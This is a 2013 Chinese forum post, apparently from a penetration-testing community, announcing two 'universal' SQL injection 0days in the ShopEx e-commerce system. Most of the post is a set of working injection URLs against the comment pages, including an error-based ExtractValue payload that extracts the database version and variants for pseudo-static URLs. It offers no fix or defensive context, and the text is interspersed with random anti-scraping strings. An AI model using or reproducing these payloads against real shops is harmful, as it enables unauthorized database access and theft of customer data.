中国网络渗透测试联盟
标题:
shopex通杀注入0day漏洞两处
[打印本页]
作者:
admin
时间:
2013-2-19 08:31
标题:
shopex通杀注入0day漏洞两处
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
* s4 v d7 _2 K& d6 C
/ ^# I- Y& e& {
好吧,我扯远了~~
1 o9 I9 L& C" K
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
8 {/ j: b9 K- |$ r
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
! s6 i( V$ b: J9 e
" O# T! g- [# x1 t' f
http://www.x.cn/index.php?comment-822
′/**/and/**/’1′=’1-ask-commentlist.html
; ?* b' ^0 X! o' Y
! q2 W. g. ?4 i) |$ W; q
http://www.x.com/comment-8967
′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
% B( T* W3 X2 M) _
* v0 \$ y+ F5 I& T6 c: \- y! T6 Q' J
http://www.x.cn/index.php?comment-822
′/**/and/**/’1′=’1-ask-commentlist.html
3 d x( B# a7 Q* j' k
! |. I& H0 i7 [9 b' A8 O/ u
http://demo.x.com.cn/485/index.php?comment-190
′/**/and/**/’1′=’1-ask-commentlist.html
" T6 A2 D+ E- U: L
% y. i/ J0 c! V
1 I* J, H) t: e
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
* ?# q5 r) `4 @$ W) h( [: C% `
如何注入就不多说了,10多年的东西了…不会也会了…
' q/ \) q) c. e A
/ N: f) J A" Q
; {/ B/ l! k- y3 i' T
$ C8 q1 ?2 F; z7 d
3 N( G+ `* f- r) \1 d8 @- r3 [
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2